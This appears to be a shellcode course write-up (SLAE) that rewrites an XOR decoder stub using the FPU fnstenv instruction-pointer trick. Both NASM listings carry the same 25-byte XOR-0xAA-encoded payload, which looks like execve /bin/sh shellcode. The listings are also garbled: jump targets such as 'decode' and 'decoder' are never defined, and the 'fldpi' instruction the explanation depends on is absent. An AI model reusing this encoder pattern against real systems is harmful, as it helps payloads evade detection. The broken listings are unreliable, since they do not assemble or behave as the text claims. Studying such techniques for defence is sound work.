Using FPU instructions rewriting the XOR decoder assembly in SLAE course
; Filename: xor-decoder.nasm
global _start
section .text
jmp short call_decoder
pop esi
xor ecx, ecx
mov cl, 25
xor byte [esi], 0xAA
inc esi
loop decode
jmp short Shellcode
call decoder
Shellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
This XOR decoder using JMP-CALL-POP technique to get the address of the shellcode and decoding with 0xAA.
; Filename: fpu-xor-decoder.nasm
global _start
section .text
xor ecx, ecx
mov cl, 25
fnstenv [esp-0xc]
pop esi
xor byte [esi+0x10], 0xAA
inc esi
loop decode
jmp short Encoded
Encoded: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
FPU Instructions:
- fnstenv will store the address of last FPU instructions onto the destination
In our case fnstenv will store the environments at esp-0xc, which will luckily allow us to get the instruction pointer at address of esp after fnstenv instruction.
Refer to:
According to Intel FPU state image in momery, the instruction pointer offset is at the position of third double word.
pop esi will get the address of fldpi
Figuring out the number of byte from fldpi to Encoded shellcode will be our last step.